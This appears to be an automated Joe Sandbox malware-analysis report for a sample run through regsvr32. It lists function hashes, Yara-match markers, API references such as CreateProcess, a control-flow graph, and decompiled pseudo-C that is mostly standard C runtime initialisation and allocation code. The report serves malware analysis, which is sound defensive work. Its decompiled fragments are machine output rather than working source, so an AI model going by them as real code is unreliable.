                                                                                        • Instruction ID: 193f60ccd2842279d11af0df6a42cb9b90b2b7ab7c379db6368ea7840d008f1f
                                                                                        • Opcode Fuzzy Hash: 4bebef8070dd7c101eddf85a5aa64f5999e83061b5374efcb24450239016e0dd
                                                                                        • Instruction Fuzzy Hash: 28A1377051478CDBDBAADF28C8C9AD93BA1FF48394FA05219FD0287251CB75D985CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: f+hb$zm
                                                                                        • API String ID: 0-4294548274
                                                                                        • Opcode ID: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                                                        • Instruction ID: b2f4f577a3df5b024e80de80ecfd692f42b94ed80d4232126a84951cd6e5a716
                                                                                        • Opcode Fuzzy Hash: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                                                        • Instruction Fuzzy Hash: 4852C97050068D8FDF98DF68C8866DA3BA1FB58388F124319FC8AA7291D778D655CBC4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #U6
                                                                                        • API String ID: 0-3443268899
                                                                                        • Opcode ID: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                                                        • Instruction ID: 59d24509ec93e958c93c94dd97d6e32fc772fd919bc53da4f0cdd3954875abf9
                                                                                        • Opcode Fuzzy Hash: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                                                        • Instruction Fuzzy Hash: 57510E715087888BC7B8DF28C49A6CBBBF1FF86344F10091DE68987260CB76D949CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 160 7fef9d27640-7fef9d27671 GetStartupInfoW call 7fef9d24980 162 7fef9d27676-7fef9d27687 160->162 163 7fef9d27693-7fef9d276ac 162->163 164 7fef9d27689-7fef9d2768e 162->164 166 7fef9d276c2-7fef9d276d7 163->166 165 7fef9d27cee-7fef9d27cf5 164->165 167 7fef9d2777d-7fef9d27784 166->167 168 7fef9d276dd-7fef9d27778 166->168 170 7fef9d27ad6-7fef9d27afb 167->170 171 7fef9d2778a-7fef9d27790 167->171 168->166 174 7fef9d27b01-7fef9d27b2e 170->174 175 7fef9d27ce0-7fef9d27cec SetHandleCount 170->175 171->170 172 7fef9d27796-7fef9d277de 171->172 176 7fef9d277f0 172->176 177 7fef9d277e0-7fef9d277ee 172->177 178 7fef9d27b30-7fef9d27b3c 174->178 179 7fef9d27b42-7fef9d27b56 174->179 175->165 180 7fef9d277fb-7fef9d27833 176->180 177->180 178->179 181 7fef9d27cc0-7fef9d27cd8 178->181 182 7fef9d27b65-7fef9d27b6d 179->182 183 7fef9d27b58-7fef9d27b63 179->183 186 7fef9d27975-7fef9d279c7 180->186 187 7fef9d27839-7fef9d2786e call 7fef9d24980 180->187 188 7fef9d27cdb 181->188 189 7fef9d27b6f-7fef9d27b7a 182->189 190 7fef9d27b7c 182->190 185 7fef9d27b95-7fef9d27bb3 GetStdHandle 183->185 191 7fef9d27c95-7fef9d27cb7 185->191 192 7fef9d27bb9-7fef9d27bc2 185->192 186->170 196 7fef9d279cd-7fef9d279d9 186->196 203 7fef9d27870-7fef9d2787d 187->203 204 7fef9d27882-7fef9d278ac 187->204 188->175 195 7fef9d27b87-7fef9d27b8e 189->195 190->195 198 7fef9d27cbe 191->198 192->191 197 7fef9d27bc8-7fef9d27be5 GetFileType 192->197 195->185 200 7fef9d27ad1 196->200 201 7fef9d279df-7fef9d279eb 196->201 197->191 202 7fef9d27beb-7fef9d27c0d 197->202 198->188 200->170 201->200 205 7fef9d279f1-7fef9d27a01 201->205 206 7fef9d27c0f-7fef9d27c29 202->206 207 7fef9d27c2b-7fef9d27c3a 202->207 203->186 208 7fef9d278c2-7fef9d278e3 204->208 205->200 209 7fef9d27a07-7fef9d27a17 205->209 210 7fef9d27c56-7fef9d27c72 InitializeCriticalSectionAndSpinCount 206->210 207->210 211 7fef9d27c3c-7fef9d27c53 207->211 212 7fef9d27970 208->212 213 7fef9d278e9-7fef9d2796b 208->213 215 7fef9d27a32-7fef9d27aad InitializeCriticalSectionAndSpinCount 209->215 216 7fef9d27a19-7fef9d27a2c GetFileType 209->216 217 7fef9d27c74-7fef9d27c79 210->217 218 7fef9d27c7b-7fef9d27c93 210->218 211->210 212->186 213->208 219 7fef9d27aaf-7fef9d27ab4 215->219 220 7fef9d27ab9-7fef9d27ace 215->220 216->200 216->215 217->165 218->198 219->165 220->200
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                                                                        • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                                                        • API String ID: 1930727954-3864165772
                                                                                        • Opcode ID: 6ce8cb6e1d9cf3b4bca9567c45291f9c0e6eb32f85ec4de2f3338e3031d5b08d
                                                                                        • Instruction ID: 1d91a8b9fbbdfe7efb2cec2f51c290a43986955e3ccc02e10ec1e86e5f3f07e0
                                                                                        • Opcode Fuzzy Hash: 6ce8cb6e1d9cf3b4bca9567c45291f9c0e6eb32f85ec4de2f3338e3031d5b08d
                                                                                        • Instruction Fuzzy Hash: 88F1D82260DBC5C9E7B08B19E88076EB7A0F385B64F258226CAED477E4DB3DD445CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                                                                        • String ID: _setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                                                                        • API String ID: 1648969265-681193798
                                                                                        • Opcode ID: a4493985eb34f23491eb94dc9b506d74831480b604230057d9b95ae3580ffa29
                                                                                        • Instruction ID: 6f04160d34b6c1fe028a5367eccc3c8ebf9b699179af2d046024218ded9634d0
                                                                                        • Opcode Fuzzy Hash: a4493985eb34f23491eb94dc9b506d74831480b604230057d9b95ae3580ffa29
                                                                                        • Instruction Fuzzy Hash: 14514F31A1DB8682EB90CB19E88576E77E0F385794F704126EACE477B4DB7EE4408B41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                                                        • String ID:
                                                                                        • API String ID: 3799933513-0
                                                                                        • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                                        • Instruction ID: 37cfb5e84e154ae2fbcc5f75e30e47dd1cf7b4373ba061ec72f9a9691eeac49a
                                                                                        • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                                        • Instruction Fuzzy Hash: 36511C3291DB4281E6A09B58EC8436EB7E0F386794F315125EACD427B9DF7EE544CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                        • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                                                                        • API String ID: 1823725401-2473407871
                                                                                        • Opcode ID: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                                                        • Instruction ID: f3219d0a3466b597a7d077589c81ae53176584dcfccb647f84a4fae4f36a6977
                                                                                        • Opcode Fuzzy Hash: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                                                        • Instruction Fuzzy Hash: B141A536618B8586E794CB56F84432FB7E1F785B94F200429EBCD47BA8DBBED4448B00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 000007FEF9D27540: _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                                                                          • Part of subcall function 000007FEF9D27540: _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                                                                          • Part of subcall function 000007FEF9D28FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000007FEF9D2906F
                                                                                        • FlsAlloc.KERNEL32 ref: 000007FEF9D23D55
                                                                                          • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                                                                          • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                                                                        • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                                                                        • API String ID: 3828364660-3898981997
                                                                                        • Opcode ID: 433987b36a956229ec77e0de1d2b7e358b1fb906a8f620ef815ae1dd4af6a87a
                                                                                        • Instruction ID: 54e8e70dd377f15c5e8b83e2f7140eab641006b368099d9e1d163193fdf976c7
                                                                                        • Opcode Fuzzy Hash: 433987b36a956229ec77e0de1d2b7e358b1fb906a8f620ef815ae1dd4af6a87a
                                                                                        • Instruction Fuzzy Hash: 5A115E30A2D60286F3E0AB25ED4577DA6E1B784B60F215671E9EE422F5DB2FE4048611
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 50%
                                                                                        			E000007FE7FEF9D2461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
                                                                                        				signed int _t64;
                                                                                        				intOrPtr _t66;
                                                                                        				void* _t73;
                                                                                        				void* _t92;
                                                                                        				long long _t98;
                                                                                        				long long _t113;
                                                                                        				long long _t114;
                                                                                        				long long _t115;
                                                                                        				long long _t130;
                                                                                        				intOrPtr _t132;
                                                                                        				long long _t135;
                                                                                        
                                                                                        				if (_a136 == 1) goto 0xf9d24672;
                                                                                        				_t64 = _a136 & 0x0000ffff;
                                                                                        				if (_t64 == 2) goto 0xf9d24672;
                                                                                        				if (_a136 == 3) goto 0xf9d24672;
                                                                                        				_a40 = "Error: memory allocation: bad memory block type.\n";
                                                                                        				_a32 = "%s";
                                                                                        				r9d = 0;
                                                                                        				r8d = 0;
                                                                                        				0xf9d2ad00();
                                                                                        				if (_t64 != 1) goto 0xf9d24672;
                                                                                        				asm("int3");
                                                                                        				_t98 = _a128 + 0x34;
                                                                                        				_a96 = _t98;
                                                                                        				0xf9d2ac90(); // executed
                                                                                        				_a80 = _t98;
                                                                                        				if (_a80 != 0) goto 0xf9d246b8;
                                                                                        				if (_a160 == 0) goto 0xf9d246b3;
                                                                                        				 *_a160 = 0xc;
                                                                                        				goto 0xf9d248b4;
                                                                                        				_t66 =  *0xf9d4b03c; // 0x38
                                                                                        				 *0xf9d4b03c = _t66 + 1;
                                                                                        				if (_a64 == 0) goto 0xf9d2472d;
                                                                                        				 *_a80 = 0;
                                                                                        				 *((long long*)(_a80 + 8)) = 0;
                                                                                        				 *((long long*)(_a80 + 0x10)) = 0;
                                                                                        				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
                                                                                        				 *((long long*)(_a80 + 0x20)) = _a128;
                                                                                        				 *(_a80 + 0x1c) = 3;
                                                                                        				 *((intOrPtr*)(_a80 + 0x28)) = 0;
                                                                                        				goto 0xf9d24844;
                                                                                        				if (0xffffffff -  *0xf9d4c960 - _a128 <= 0) goto 0xf9d24763;
                                                                                        				_t130 =  *0xf9d4c960; // 0x42cc
                                                                                        				 *0xf9d4c960 = _t130 + _a128;
                                                                                        				goto 0xf9d2476e;
                                                                                        				 *0xf9d4c960 = 0xffffffff;
                                                                                        				_t132 =  *0xf9d4c990; // 0xa0c
                                                                                        				 *0xf9d4c990 = _t132 + _a128;
                                                                                        				_t113 =  *0xf9d4c978; // 0x32f4
                                                                                        				_t92 =  *0xf9d4c990 - _t113; // 0xa0c
                                                                                        				if (_t92 <= 0) goto 0xf9d247a8;
                                                                                        				_t114 =  *0xf9d4c990; // 0xa0c
                                                                                        				 *0xf9d4c978 = _t114;
                                                                                        				if ( *0xf9d4c980 == 0) goto 0xf9d247c4;
                                                                                        				_t115 =  *0xf9d4c980; // 0x2303b00
                                                                                        				 *((long long*)(_t115 + 8)) = _a80;
                                                                                        				goto 0xf9d247d0;
                                                                                        				 *0xf9d4c968 = _a80;
                                                                                        				_t135 =  *0xf9d4c980; // 0x2303b00
                                                                                        				 *_a80 = _t135;
                                                                                        				 *((long long*)(_a80 + 8)) = 0;
                                                                                        				 *((long long*)(_a80 + 0x10)) = _a144;
                                                                                        				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
                                                                                        				 *((long long*)(_a80 + 0x20)) = _a128;
                                                                                        				 *(_a80 + 0x1c) = _a136;
                                                                                        				_t78 = _a88;
                                                                                        				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
                                                                                        				 *0xf9d4c980 = _a80;
                                                                                        				r8d = 4;
                                                                                        				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
                                                                                        				_t145 = _a128;
                                                                                        				r8d = 4;
                                                                                        				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
                                                                                        				_t73 = E000007FE7FEF9D232B0( *0xf9d4b04f & 0x000000ff, _t78,  *0xf9d4b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
                                                                                        				_a72 = _a80 + 0x30;
                                                                                        				return E000007FE7FEF9D29360(_t73, 4);
                                                                                        			}














                                                                                        0x7fef9d24623
                                                                                        0x7fef9d2462c
                                                                                        0x7fef9d24634
                                                                                        0x7fef9d2463e
                                                                                        0x7fef9d24647
                                                                                        0x7fef9d24653
                                                                                        0x7fef9d24658
                                                                                        0x7fef9d2465b
                                                                                        0x7fef9d24665
                                                                                        0x7fef9d2466d
                                                                                        0x7fef9d2466f
                                                                                        0x7fef9d2467a
                                                                                        0x7fef9d2467e
                                                                                        0x7fef9d24688
                                                                                        0x7fef9d2468d
                                                                                        0x7fef9d24698
                                                                                        0x7fef9d246a3
                                                                                        0x7fef9d246ad
                                                                                        0x7fef9d246b3
                                                                                        0x7fef9d246b8
                                                                                        0x7fef9d246c0
                                                                                        0x7fef9d246cb
                                                                                        0x7fef9d246d2
                                                                                        0x7fef9d246de
                                                                                        0x7fef9d246eb
                                                                                        0x7fef9d246f8
                                                                                        0x7fef9d2470c
                                                                                        0x7fef9d24715
                                                                                        0x7fef9d24721
                                                                                        0x7fef9d24728
                                                                                        0x7fef9d24743
                                                                                        0x7fef9d2474d
                                                                                        0x7fef9d2475a
                                                                                        0x7fef9d24761
                                                                                        0x7fef9d24763
                                                                                        0x7fef9d24776
                                                                                        0x7fef9d24783
                                                                                        0x7fef9d2478a
                                                                                        0x7fef9d24791
                                                                                        0x7fef9d24798
                                                                                        0x7fef9d2479a
                                                                                        0x7fef9d247a1
                                                                                        0x7fef9d247b0
                                                                                        0x7fef9d247b2
                                                                                        0x7fef9d247be
                                                                                        0x7fef9d247c2
                                                                                        0x7fef9d247c9
                                                                                        0x7fef9d247d5
                                                                                        0x7fef9d247dc
                                                                                        0x7fef9d247e4
                                                                                        0x7fef9d247f9
                                                                                        0x7fef9d24809
                                                                                        0x7fef9d24819
                                                                                        0x7fef9d24829
                                                                                        0x7fef9d24831
                                                                                        0x7fef9d24835
                                                                                        0x7fef9d2483d
                                                                                        0x7fef9d24854
                                                                                        0x7fef9d2485c
                                                                                        0x7fef9d2486d
                                                                                        0x7fef9d2487a
                                                                                        0x7fef9d24882
                                                                                        0x7fef9d248a1
                                                                                        0x7fef9d248af
                                                                                        0x7fef9d248c7

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _unlock
                                                                                        • String ID: Error: memory allocation: bad memory block type.
                                                                                        • API String ID: 2480363372-1537269110
                                                                                        • Opcode ID: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                                                        • Instruction ID: 3c0f980f6ccd09ea8afc11027f8ae4c535623d5f1e7c019e481493293b97b3b1
                                                                                        • Opcode Fuzzy Hash: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                                                        • Instruction Fuzzy Hash: 4B71EB36A09B8586DBA0CB59E89036EB7E0F3C9B90F218526DADD437A4DF7DD044CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID: z
                                                                                        • API String ID: 963392458-1375040831
                                                                                        • Opcode ID: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                                        • Instruction ID: 5490f85ef4092ec497088e60b932e525f0ce693db587fe3a551d92928695aba5
                                                                                        • Opcode Fuzzy Hash: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                                        • Instruction Fuzzy Hash: 5141C27191C7848FD7A5DF18D08A7DAB7E0FB98318F01495DE88CC7292DB749885CB46
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID: z
                                                                                        • API String ID: 963392458-1375040831
                                                                                        • Opcode ID: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                                        • Instruction ID: 90d0215384d3738c1bd812602d16852eefab8a4974bd8bae5625081230a7a3ff
                                                                                        • Opcode Fuzzy Hash: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                                        • Instruction Fuzzy Hash: 4741377091CB848BD7B4DF18D08A7AAB7E0FB98315F10495EE88CC3252DB7498848B86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer_initterm_e
                                                                                        • String ID: Y
                                                                                        • API String ID: 1618838664-1754117475
                                                                                        • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                                        • Instruction ID: e2eda9ea6841371ef03f52dec0317b7f8d7542193ab5d09d46fee122be74aa2a
                                                                                        • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                                        • Instruction Fuzzy Hash: 1DE0C22190C042A7FAA1AB24ED453BE63E0B791344FA14231E2CD824B5EB2FF908CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 62%
                                                                                        			E000007FE7FEF9D27540(long long __rax) {
                                                                                        				long long _v24;
                                                                                        				void* _t8;
                                                                                        				void* _t9;
                                                                                        
                                                                                        				_t16 = __rax;
                                                                                        				_t9 = E000007FE7FEF9D23D00(_t8); // executed
                                                                                        				_v24 = __rax;
                                                                                        				return E000007FE7FEF9D2CF20(E000007FE7FEF9D2CFB0(E000007FE7FEF9D2D450(E000007FE7FEF9D2D470(E000007FE7FEF9D2BD50(E000007FE7FEF9D2AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
                                                                                        			}






                                                                                        0x7fef9d27540
                                                                                        0x7fef9d27544
                                                                                        0x7fef9d27549
                                                                                        0x7fef9d2758e

                                                                                        APIs
                                                                                          • Part of subcall function 000007FEF9D23D00: RtlEncodePointer.NTDLL ref: 000007FEF9D23D06
                                                                                        • _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                                                                        • _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                                                                          • Part of subcall function 000007FEF9D2CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF9D2758A,?,?,?,?,?,?,000007FEF9D23D39), ref: 000007FEF9D2CF30
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                                                                        • String ID:
                                                                                        • API String ID: 2678799220-0
                                                                                        • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                                                        • Instruction ID: d1131ca10be328b200f0d94da683d71e83c9d45f094ccb2362bb8b9ac37f618d
                                                                                        • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                                                        • Instruction Fuzzy Hash: CFE07D6391D58181E6B0BB21EC5226E93B0F7C8788F610171B6CD47A7BCE1DE9018B80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
